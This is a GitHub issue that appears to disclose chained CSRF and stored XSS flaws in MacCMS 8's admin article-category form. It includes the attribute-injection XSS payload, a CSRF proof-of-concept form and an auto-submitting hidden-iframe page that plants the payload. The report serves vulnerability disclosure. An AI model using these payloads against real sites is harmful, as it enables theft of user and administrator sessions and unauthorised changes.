Skip to content

There are CSRF and XSS vulnerabilities in the background, which can be combined to steal user cookies and administrator cookies #2

Closed
@Trepverterless

Description

@Trepverterless

xss

XSS vulnerability exists in the background administrator article management office when adding and modifying
Where Chinese and English names are entered, enter
" onmousemove=alert(document.cookie) src=x,Following chart
1
Move the mouse over the label in the background article management area and the administrator cookie will pop up, as shown in the following figure
2
User cookies will also pop up when the front page mouse moves over the title
3


csrf

It is found that CSRF exists at the same time of adding and modifying
Before use
4
When the following page is constructed, the administrator can be induced to click

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/maccms8/safetest/admin_data.php?ac=save&tab=art_type" method="POST">
      <input type="hidden" name="t&#95;id" value="" />
      <input type="hidden" name="flag" value="add" />
      <input type="hidden" name="backurl" value="http&#58;&#47;&#47;localhost&#47;maccms8&#47;safetest&#47;index&#46;php&#63;m&#61;art&#45;type" />
      <input type="hidden" name="t&#95;pid" value="0" />
      <input type="hidden" name="t&#95;name" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;enname" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;tpl" value="art&#95;type&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;list" value="art&#95;list&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;art" value="art&#95;detail&#46;html" />
      <input type="hidden" name="t&#95;key" value="" />
      <input type="hidden" name="t&#95;des" value="" />
      <input type="hidden" name="t&#95;title" value="" />
      <input type="hidden" name="t&#95;sort" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

When the administrator visits the click Page
image

Category added successfully
image


csrf+xss

Here, CSRF and XSS can be used together, and attackers can use CSRF vulnerability to add or fix code brought in by articles,

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Welcome to CSRF</title>
</head>
<p style="color:blue; text-align:center; font-size:60px;">Your're by CSRF</p>
<body>
<iframe hidden width=1000 heigth=100 src="#" srcdoc='
<form action="http://localhost/maccms8/safetest/admin_data.php?ac=save&tab=art_type" method="POST" name="form">
      <input type="hidden" name="t&#95;id" value="" />
      <input type="hidden" name="flag" value="add" />
      <input type="hidden" name="backurl" value="http&#58;&#47;&#47;localhost&#47;maccms8&#47;safetest&#47;index&#46;php&#63;m&#61;art&#45;type" />
      <input type="hidden" name="t&#95;pid" value="0" />
      <input type="hidden" name="t&#95;name" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;enname" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;tpl" value="art&#95;type&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;list" value="art&#95;list&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;art" value="art&#95;detail&#46;html" />
      <input type="hidden" name="t&#95;key" value="" />
      <input type="hidden" name="t&#95;des" value="" />
      <input type="hidden" name="t&#95;title" value="" />
      <input type="hidden" name="t&#95;sort" value="" />
      <input type="submit" value="Submit request" />
    </form>
<script>
//Automatic submission
document.form.submit();
</script>
'></iframe>
</body>
</html>

After the user accesses the link, the hidden iframe automatically submits the form and successfully adds the article classification with malicious code without the user's knowledge. Malicious code can send the user's cookie to the attacker's remote server and steal the user's cookie or administrator's cookie.
image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions